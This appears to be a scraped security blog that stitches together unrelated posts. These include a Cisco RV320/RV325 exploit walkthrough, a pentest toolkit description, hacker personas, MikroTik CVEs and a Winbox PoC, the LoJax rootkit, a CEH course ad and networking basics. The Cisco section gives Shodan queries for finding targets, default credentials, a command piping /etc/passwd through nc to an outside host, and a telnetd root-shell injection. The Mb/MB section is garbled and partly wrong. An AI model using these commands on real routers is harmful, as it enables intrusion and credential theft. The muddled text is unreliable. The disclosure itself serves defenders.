Vulnerabilities found in Cisco two Routers new exploits by hacker

Two vulnerabilities found in Cisco Routers CVE-2019-1653 and CVE-2019-1652 was discovered by German Security Researchers.

Attacks started on Friday, January 25, after security researcher David Davidson published a proof-of-concept exploit for two Cisco RV320 and RV325 vulnerabilities.

CVE-2019-1653 – To allow a remote attacker to get sensitive device configuration details without a password.
CVE-2019-1653 – To allow a remote attack to inject and run admin commands on the device without a password.
Proof of Concept (POC)
CVE-2019-1652 /CVE-2019-1653 Exploits For Dumping Cisco RV320 Configurations & Debugging Data AND Remote Root Exploit!

CVE-2019-1653/CVE-2019-1652 Exploits for Dumping Cisco RV320 Configurations and getting RCE

Implementations of the CVE-2019-1652 and CVE-2019-1653 exploits disclosed by Red Team Pentesting GmbH.
I only tested these on an RV320, but according to the Cisco advisory, the RV325 is also vulnerable.

The following Shodan queries appear to find them, if you are curious about how many are out there. There seems to be quite a few…

port:161 RV325
port:161 RV320
The vulnerabilities allow for the following:
Dumping (Plaintext) Configuration File! (includes hashes for the webUI!)
Dumping (Encrypted) Diagnostic/Debug Files! (including config, and the /etc and /var directories)
Decrypting the encrypted Diagnostic/Debug Files! (yes, you get /etc/shadow!)
Post-Authentication Remote Command Injection as root in the webUI!
As an aside, the default creds are cisco:cisco.

Config Dumper Exploit.
For the configuration dump exploit, just set target, port, ssl on/off, and output directory. It will dump the configuration to there.

$ python -t x.x.x.x -p 8443 -s -d output
{+} Sending request to https://x.x.x.x:8443/cgi-bin/config.exp
{*} We seem to have found a valid config! Writing to output/x.x.x.x_8443.conf
Debug Data Dumper Exploit.
For the debug data dumping exploit, it is the same routine, but the dumped data is larger and encrypted. You will want to decrypt this using the provided “” script, or manually using openssl. This will give you a tar file. The debug output not only gets you the config, but also backups of /etc and /var, and yes, the /etc/shadow/ file is present. I’ll eventually rewrite the decryption script in Python, but this was a quick kludge.

$ python -t x.x.x.x -p 8443 -s -d output
{+} Sending request to https://x.x.x.x:8443/cgi-bin/export_debug_msg.exp
{*} We seem to have found a valid encrypted config! Writing to output/x.x.x.x_8443.enc
$ ./ output/x.x.x.x_8443.enc
Cisco Encrypted Debug Data Decryption Script!
{+} Decrypting output/x.x.x.x_8443.enc
{+} Plaintext should be at output/x.x.x.x_8443.enc.decrypted.tar.gz...
Using the creds you get from these (hashed) you can then exploit CVE-2019-1652 to execute commands on the device.

A few notes on the “hashing” of the password, before we go any further. On these, in the config file, you will find a variable named PASSWD followed by an md5 hash. This md5 hash is md5($password.$auth_key), where the auth_key is a static value you can find by doing a GET / and parsing. There is a seemingly common one that I hardcoded into the RCE exploit as a fallback incase the page parser bullshit regex fails.

Post-Auth RCE Exploit
CVE-2019-1652 outlines a trivial shell command injection vulnerability, which requires authentication. implements this, assuming you have valid login creds. “cisco:cisco” is the default, but you could also crack some hashes.

The command injection is blind, so you won’t get any output. The environment is an incredibly limited Busybox setup with a crippled netcat, and the boxes are mips64, so I didn’t bother writing a reverse-shell exploit this time. You can, however, get command output by doing stuff like cat /etc/passwd | nc HOST PORT and having a listener running, or whatever.

You can also inject a command like telnetd -l /bin/sh -p 1337 and connect to the resultant telnet service, which will serve you up a nice unauthenticated root shell.

Example run of the exploit below:

$ python -t x.x.x.x -s -p 8443 -U cisco -P cisco -c "cat /etc/passwd | nc x.x.x.x 1337"
{+} Sending request to https://x.x.x.x:8443/ to extract auth key...
{*} Got auth_key value: 1964300002
{+} Login Successful, we can proceed!
{+} Ok, now to run your command: cat /etc/passwd | nc x.x.x.x 1337
{+} We don't get output so... Yeah. Shits blind.
# on listener...
$ nc -lp 1337

Cisco Team have patched these vulnerabilities.

Advanced Network Reconnaissance Toolkit for Penetration Testing

Advanced Network Reconnaissance Toolkit for Penetration Testing

Advanced Network Reconnaissance Toolkit For Penetration Testing.

badKarma is a python3 GTK+ toolkit that aim to assist penetration testers during all the network infrastructure penetration testing activity phases. 

It allow testers to save time by having point-and-click access to their toolkits, launch them against single or multiple targets and interact with them through simplified GUIs or Terminals.

Every task's output is logged under a session file in order to help during reporting phase or in a possible incident response scenario. It is also available a proxy-chains switch that let everything go through proxies, and last but not least, every command can be adjusted before the execution by disabling the "auto-execute" checkbox.

badKarma is licensed under GNU GPL version 3.

Session file

The Session file is just a sqlite database, it contains all the information gained during the activity, real-time updated it can be exported or/and imported from badKarma's GUI. By default the database is located inside the "/tmp" directory, this means that you have to save it in a different location before rebooting your computer.

Inside the database there are four tables: hosts, ports, activity_log and notes.


It is possible to add targets and scan them with nmap and/or masscan from the GUI, some defaults scan profiles are already available as well. It is also possible to import XML scanners result from the main menu.

By default all the scan output are stored inside the 
"/tmp" directory , then the output is imported in the session file and deleted.


badKarma is modular, the extensions are full-interactive and they allow the penetration tester to tune tasks options, since output is logged under the session file, their output can be exported as a raw txt from the "Logs" tab.

Extensions can be found under the "extension" directory,current available extensions are:

  • Shell: this is the main module of the toolkit since it allow the tester to execute preconfigured shell tasks. Shell commands are located under the "conf" directory.
  • Bruter: as the name says, bruter is the brute-force extension. It allow the tester to send a target directly to Hydra and configure the parameters through a GUI.
  • Screenshot: this extension allow the tester to take a screenshot of possibile http,rdp,rtsp,vnc and x11 servers, the screenshot will be stored in the log database as base64 and can be shown from badKarma.
  • Browser: just an "open in browser" for http menu item, take it as an example to build your own extensions.


install Kali linux dependecies:

# apt install python3-pip python3-gi phantomjs gir1.2-gtk-vnc-2.0 ffmpeg
clone the repository:

$ git clone

install python dependecies:

# cd badKarma
# pip3 install -r requirements.txt

$ chmod +x
$ ./




The bad guys behind the latest cyber security attacks get up close and personal with these hacker personalities. Learn to recognize them and protect your cyber-data.

Hacktivist Anonymous
My Motives: Disrupting the status quo, seeking virtual mischief and mayhem to make a point to the governments and large corporations, freeing terrorists, vigilante-ism, boxing, cyber protest, anarchy, fun.
My Boss: Myself and what I believe in, totally decentralized
My comrades: 4chan, Anonymous, Lulzsec, AntiSec
My Tools: Web application attacks using freely available tools
My Favorite Beverage: Energy Drinks
My Methods: I use freely available script kiddie’s tools to launch DDoS attacks or web application attacks to try to hijack a legitimate website or steal data.
My Street Cred: I was responsible for 58% of all data theft in 2011, but in 2012 my fellow hackers foot a bigger piece of the pie
My Hero: Guy Franks, the face of Anonymous hacker group

My Claims to Fame:  Project chorology, Operation payback Arab spring activities, operation HBGary, operation ouraborus, operation Sony operation Megaupload, just to name a few.

My Motives: Identity theft, credit card information, extortion (via ransoware or DDos), click-jacking, pirating software, monetizing computer data in any way possible
My Boss:  My financier, a traditional criminal organization that has decided to recruit tech savvy kids
My comrades: Other cyber criminals in the underground market, where we swap hacking kits
My Tools: Exploit kits sold on underground internet (or darknet) markets and forums and tools I also buy and sell prepackaged botnets and botnet modules
My Favorite Beverage: Vodka
My Methods: I prefer web-based drive-by downloads, ransoware and fakeware, and can even use my victims to attack others
My Street Credit: I took $20.7 billion from consumers last year
My Hero: Albert Gonzalez, who stole over 170 million credit and debit card numbers in two years 
My Claims to Fame: I recently completed a global bank heist, stealing about $45 million from ATMs 

My Motives: Obtaining intelligence form my foes, cyber espionage, stealing secrets from my adversaries, disrupting or damaging an enemy’s military infrastructure, propaganda, distracting an enemy during a real attack
My Boss: My government
My comrades: I only trust a few people within my government organization
My Tools: Customized, advanced malware and toolsets designed for a very specific goal (i.e. Stuxnet, Flame, and Gauss)
My Favorite Beverage: A martini – shaken, not stirred
My Methods: Advanced persistent threats, zero days exploits, rootkit technology, strong encryption, and malware customized for non-traditional computing systems
My Street Cred: IN the Aurora attacks of 2009. I introduced the watering hole attack and hole targeted over 30 large companies including Google
My Hero: UglyGorilla (real name: Jack wang)
My Claims to Fame:  Google Aurora attacks, New York Times hack, and other classified security breaches

The difference between Megabyte (MB) and a Megabit (Mb)

The difference between Megabyte (MB) and a Megabit (Mb)

People confusion is the difference between a Megabyte (used for file size) and a Megabit (used for download speeds). People often assume that a download speed of 1 Megabit per second (1 Mbps) will allow them to download a 1 Megabyte file in one second. This is not the case, a Megabit is 1/8 as big as a Megabyte, meaning that to download a 1 MB file in 1 second you would need a connection of 8 Mbps. The difference between a Gigabyte (GB) and a Gigabit (Gb) is the same, with a Gigabyte being 8 times larger than a Gigabit.

Many people who lack knowledge of technology while using MB and MB about the file size of the internet and file size. This is the meaning and the difference:

Meaning of Mb and MB
Mbps means megabits per second. Mb is used for download and upload speed.
MBps stands for megabytes per second. MB is used for file size.

You’ll spot these terms when you download a file from the Internet or transfer data from one device to another. They show the data transfer rate. Your connection speed (download and upload) will display as megabits per second. But, you’re downloading or transferring megabytes.

Mb means mega bit - mega bit | MB Mega Byte - Mega Byte |
1 byte gets 8 bit | Byte is written big B if bit is smaller
Mega means the million - example 10 lakh - 10, 00,000 Mb explains the number of 10 million bit if MB numbered by one million byte

Mbps (symbol Mbit/s or Mb/s):  Megabit per second
MBps: Megabyte per second
8 bits = 1 byte
1 Mbps = 1,000,000 bits per second
1 MBps = 1,000,000 bytes per second = 8,000,000 bits per second = 8 Mbps

Variations of Mb and MB
There is 8 Mb in 1 MB
Therefore, 1 MB = 8 Mb
Speed ​​(Mb per second)
Downloading size in a second - MB
1 Mbps = 0.125 MB or 128 KB
4 Mbps = 0.5 MB
8 Mbps = 1 MB
80 Mbps = 10 MB
1 Gbps = 128 MB or 0.125 GB
8 Gbps = 1 GB

Meaning of Mbps and MBps?
We measure the scale of Internet for every second
The meaning of 1 Mbps Download Speed ​​is that we can download 1 Mb i.e. 0.128 MB size file in a second.

Similarly, 8 Mbps can be downloaded to 8 Mb namely 1 MB from Sped in seconds
At the Internet Sped we use Mbps, but the size of the file that we download is used MB. This is mainly the confusion in the user Internet service providers tend to preach at Mbps, but we download files of MB or GB if we download
The Internet Service Provider has provided download speeds of 20 Mbps, and you can download file 2.5 MBps in the spreadsheet. Remember - say 20 Mb and 2.5 MB is the same

For example:
Size of a video to download: 20 MB
You're Internet Speed: 1 Mb per second
Time to download = 160 seconds

There is 160 MB in 20 MB Your 1 Mbps Internet can download 1 Mb for one inch So the 20 MB (160 Mb) download looks 160 seconds

What is Bandwidth?
Bandwidth is defined as a range within a band of frequencies or wavelengths. Bandwidth is also the amount of data that can be transmitted in a fixed amount of time. For digital devices, the bandwidth is usually expressed in bits per second (bps) or bytes per second.example this image show download speed test.

New MikroTik Router Vulnerabilities Winbox Gives Full Root Access exploit CVE

New MikroTik Router Vulnerabilities Winbox Gives Full Root Access exploit CVE

New MikroTik Router Vulnerabilities CVE Found
Besides this, Tenable Research also disclosed additional MikroTik RouterOS vulnerabilities, including:
CVE-2018-1156—A stack buffer overflow flaw that could allow an authenticated remote code execution, allowing attackers to gain full system access and access to any internal system that uses the router.
CVE-2018-1157—A file upload memory exhaustion flaw that allows an authenticated remote attacker to crash the HTTP server.
CVE-2018-1159—A www memory corruption flaw that could crash the HTTP server by rapidly authenticating and disconnecting.
CVE-2018-1158—A recursive parsing stack exhaustion issue that could crash the HTTP server via recursive parsing of JSON.

The vulnerabilities impact MikroTik RouterOS firmware versions before 6.42.7 and 6.40.9.
Tenable Research reported the issues to MikroTik in May, and the company addressed the vulnerabilities by releasing its RouterOS versions 6.40.9, 6.42.7 and 6.43 in August. While all the vulnerabilities were patched over a month ago, a recent scan by Tenable Research revealed that 70 percent of routers (which equals to 200,000) are still vulnerable to attack.

Details: CVE-2017-8338
A vulnerability in MikroTik Version 6.38.5 could allow an unauthenticated remote attacker to exhaust all available CPU via a flood of UDP packets on port 500 (used for L2TP over IPsec), preventing the affected router from accepting new connections; all devices will be disconnected from the router and all logs removed automatically. Vulnerability

Details: CVE-2018-7445
A buffer overflow was found in the MikroTik RouterOS SMB service when processing NetBIOS session request messages. Remote attackers with access to the service can exploit this vulnerability and gain code execution on the system. The overflow occurs before authentication takes place, so it is possible for an unauthenticated remote attacker to exploit it. All architectures and all devices running RouterOS before versions 6.41.3/6.42rc27 are vulnerable. Vulnerability
Details: CVE-2017-7285

A vulnerability in the network stack of MikroTik Version 6.38.5 released 2017-03-09 could allow an unauthenticated remote attacker to exhaust all available CPU via a flood of TCP RST packets, preventing the affected router from accepting new TCP connections. Vulnerability
Details: CVE-2018-10070

A vulnerability in MikroTik version 6.41.2 could allow an unauthenticated remote attacker to exhaust all available RAM by sending a crafted FTP request on port 21 that begins with many "\0" characters, preventing the affected router from accepting new FTP connections. The router will be reboot after 10 minutes, logging a router was rebooted without proper shutdown message.
Details: CVE-2018-7745

A buffer overflow was found in the MikroTik RouterOS SMB service when processing NetBIOS session request message, Remote attackers with access to the service can exploit this vulnerability and gain code execution on the system. The overflow occurs before authentication taker place, so it is possible for an unauthenticated remote attacker to exploit it. All architecture and all devices running RouterOS before version 6.41/6.4rc27 are vulnerable.

Details: CVE-2018-10066
An issue was discovered in MikroTik RouterOS 6.41.4. Missing OpenVPN server certificate verification allows a remote unauthenticated attacker capable of intercepting client traffic to act as a malicious OpenVPN server. This may allow the attacker to gain access to the client's internal network (for example, at site-to-site tunnels).

Product Type

Lojax UEFI Rootkit Russian Hackers Use Malware That Can Survive OS

Security firm ESET discovered the powerful malware, dubbed Lojax, infecting a victim's computer and suspects the malicious code came from the hacking group known as Fancy Bear.The attack targeted the computer's UEFI, which stands for Unified Extensible Firmware Interface, and is used to boot up the system. By re-writing the UEFI, the malware can persist inside the computer's flash memory, allowing it to survive operating system reinstalls and hard disk replacements.

Getting rid of the malware means going in and over-writing the flash storage's memory, "an operation not commonly done and certainly not by the typical user," ESET said in a blog post. ESET refrained from naming the owner of the infected computer, but the security firm said it has detected Fancy Bear using different components of Lojax on government organizations based in the Balkans and other Central and Eastern European countries.

According to ESET, Lojax is the first time a UEFI-based rootkit has ever been detected attacking a computer system in the real world. Before this, experts had mainly talked about UEFI rootkits as a theoretical attack, although there was evidence that private security firms were selling the hacking tools to government customers. ESET said Lojax's behavior mimics a legitimate software tool called LoJack, an anti-theft product that's also hard to remove from a PC. "Since this software's intent is to protect a system from theft, it is important that it resists OS re-installation or hard drive replacement. Thus, it is implemented as a UEFI/BIOS module, able to survive such events," ESET said.

Fancy Bear appears to have weapon zed the LoJack anti-theft product to both help the group attack computers and bypass security software. ESET noted that many antivirus vendors will allow LoJack to run on a PC, assuming the system processes are safe.

The APT has been in operation since at least 2004. Allegedly directed by the Russian government, the hacking group has been connected to attacks against the US Democratic National Committee (DNC) ahead of the US elections, the World Anti-Doping Agency (WADA), the Association of Athletics Federations (IAAF), the German government, and the Ukrainian military, among others.

It isn't clear how Fancy Bear delivered the malware, but it can be used to download other malicious software modules to the infected computer. "As LoJax's best quality is to be stealthy and persistent, it could definitely be used to help ensure that access to key resources is maintained," ESET said in a separate report.
Sources page: PCmag

Certified Ethical Hacker Certification Class descroption

Certified Ethical Hacker (CEH) is a professional who has mastered the techniques to get an access to the target systems, in a lawful manner, which are vulnerable and prone to flaws. This certification is provided by EC Council. Safeguarding of the security system from being exposed to malicious contents is a must, which can be possibly done only by a professional; hence, the Certified Ethical Hacker course has been drawing a lot of attention.

EC-Councils Official delivery platform includes your study material, iLabs (virtual labs) and gives you the most flexible options for training to fit your busy work schedule's give a different type courses of certification, Degrees provide lab iclass &training. C|EH class provide Brochure, Handbook Blue print, Policies, Exam FAQ, Eligibility

Certified ethical hacking course with 20 of the most current security domains any individual will ever want to know when they are planning to beef up the information security posture of their organization. In 20 comprehensive modules, the course covers 340 attack technologies, commonly used by hacker.

The EC-Council CEH attempt exam refundable eligibility application fee of USD 100.00 and you can buy Amazon book CEH v10: EC-Council Certified Ethical Hacker Complete Training guide with Practice labs exam: 312:50 $29.05 office Amazon website link

Nepal offers certified ethical hacking training in Nepal to produce certified ethical hackers capable of identifying and safeguarding IT systems against vulnerabilities. Ethical Hacking certification recognizes IT security professional as an expert to handle security issues in any network and computer system. Our IT institute provide a different type of course better in Nepal C|EH Training & Class the name list down below.

What is C|EH?
The most desired information security training program in the industry, the accredited course provides the advanced hacking & information security professionals alike to break into an organization.
Course content
Over 140 labs that mimic real scenarios
Over 2,200 commonly used hacking tools to immerse you in the hacker world
Over 1,685 graphically rich, specially designed slides to help you grasp complex security concepts in depth.
What's New in CEH V10?
Inclusion of New modules - IoT Hacking and vulnerability analysis, Focus on emerging attack vectors - cloud, Al, ML, etc.
Hacking challenges at the end of each module coverage of the latest Malware, Inclusion of complete Malware analysis process and covers latest hacking tools.
5 Phases of Ethical Hacking
Reconnaissance, Enumeration, Gaining Access, Maintaining Access, Covering Tracks

Duration: 2 Months
About the Exam
Number of Questions: 125
Test Duration: 4 Hours
Test Format: Multiple Choice
Test Delivery: ECC EXAM, VUE
Exam Prefix: 312-50 (ECC EXAM), 312-50 (VUE)
Passing score 60% to 80%

New in CEH Version 10 Course

CEH Version 10 Course:
Module 01: Introduction to Ethical Hacking
Module 02: Footprinting and Reconnaissance
Module 03: Scanning Networks
Module 04: Enumeration
Module 05: Vulnerability Analysis
Module 06: System Hacking
Module 07: Malware Threats
Module 08: Sniffing
Module 09: Social Engineering
Module 10: Denial-of-Service
Module 11: Session Hijacking
Module 12: Evading IDS, Firewalls, and Honeypots
Module 13: Hacking Web Servers
Module 14: Hacking Web Applications
Module 15: SQL Injection
Module 16: Hacking Wireless Networks
Module 17: Hacking Mobile Platforms
Module 18: IoT Hacking
Module 19: Cloud Computing
Module 20: Cryptography

MikroTik Router's 200, 00 vulnerability hacker inject Crypto mining Malware

MikroTik Router's 200, 00 vulnerability hacker inject Crypto mining Malware
Security research proof of Concept of Winbox Critical Vulnerability (CVE-2018-14847) found MikroTik routers more than 200,000 backdoor access to the device version. Malware campaigns have compromised more than 210,000 routers from Latvian network hardware provider MikroTik across the world

What is MikroTik?
According to the official website, MikroTik is a Latvian company which was founded in 1996 to develop routers and wireless ISP systems. MikroTik now provides hardware and software for Internet connectivity in most of the countries around the world. RouterOS is the operating system of most MikroTik devices. The vulnerability affects all versions of RouterOS from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20)

The hacker easy exploiting a vulnerability in the Winbox application of MikroTik router that was discovered in April this year and patched within a day of its discoverySecurity flaw can potentially allow an attacker to gain unauthenticated, remote attacker administrative access to any vulnerable MikroTik router.

Malware campaigns that infected 25,500 and 16,000 MikroTik routers, mainly in Moldova, with malicious crypto currency mining code from infamous CoinHive service. 

Targeting networking devices in Brazil, where a hacker or a group of hackers compromised more than MikroTik routers devices. MikroTik routers are targeted to spread malware. In March this year, a sophisticated APT hacking group exploited unknown vulnerabilities in MikroTik routers to covertly plant spyware into victims' computers.

MikroTik devices. However, the vulnerability which allowed the firm's routers to become crypto currency mining slaves was no zero-day; instead, it is CVE-2018-14847, a known security bug impacting Winbox for MikroTik RouterOS.
Through version 6.42 of the software, remote attackers are able to bypass authentication and read arbitrary files by modifying a request to change one byte related to a Session ID, according to the vulnerability description. 

Vulnerability MikroTik router exploiting PoC ip address target and MAC address they can access to the device. The office github link download python script pentesting os platform Linux os. All versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable. "WARNING EDUCATIONAL PURPOSE ONLY"

How to use
Note that this script will NOT run with Python2.x. Use only Python 3+
Winbox (TCP/IP)
$ python3
User: admin
Pass: Th3P4ssWord

MAC server Winbox (Layer 2)
You can extract files even if the device doesn't have an IP address :-)
$ python3

Looking for Mikrotik devices (MAC servers)
$ python3 aa:bb:cc:dd:ee:ff
User: admin
Pass: Th3P4ssWord

Mitigation Techniques
Update your RouterOS to the last version or Bugfix version
Do not use Winbox and disable it :| it's nothing just a GUI for NooBs ..
you may use some Filter Rules (ACL) to deny anonymous accesses to the Router
ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
Surces page GitHub



What is IP address?
The internet address (IP address) is 32bits that uniquely and universally defines a host or router on the internet. The portion of the IP address that identifies the network is called net id. The portion of the IP address that identifies the host or router on the network is called host id.

What is Special Public IP?
ISP have provided a specific public IP for you, you have full rights to use and manage this public IP into your network, because this public IP specifically for you and no one can use it. You like given the address or name on the internet to your network. ISP will give you a special price for this.

What is Common Public IP?
ISP is not given special IP address or name to you on the internet, but you still use public IP to be connected to the internet. In this case you will use the public IP together with all clients of your ISP and this public IP fully managed by ISP itself. You like being under their clients network there is no special name for your network.

What is Static Public IP?
Public IP that is used will not be changed because it is not planned to be changed, this public IP can be Special Public IP or Common Public IP as our terms.

What is Dynamic Public IP?
Public IP that always be changed dynamically when you use connect to internet, the changes have ranges as the network mask of the public IP that used by ISP. Same like Static Public IP, it can be Special Public IP or Common

What is Local IP?
Local IP addresses both serve the same purpose, the difference is scope. An external or public IP address is used across the entire Internet to locate computer systems and devices. A local or internal IP address is used inside a private network to locate the computers and devices connected to it.

Define LAN, MAN and WAN.
LAN- A local area network (LAN) is a privately owned and links the devices in a single office, building or campus. It allows resources to be shared between personal computers and work stations. MAN- A metropolitan-area network (MAN) spreads over an entire city. It may be wholly owned and operated by a private company, example local telephone company. WAN – A wide area network (WAN) provides long distance transmission of data, voice, image and video information over large geographic areas that comprise a country, a continent or even whole world.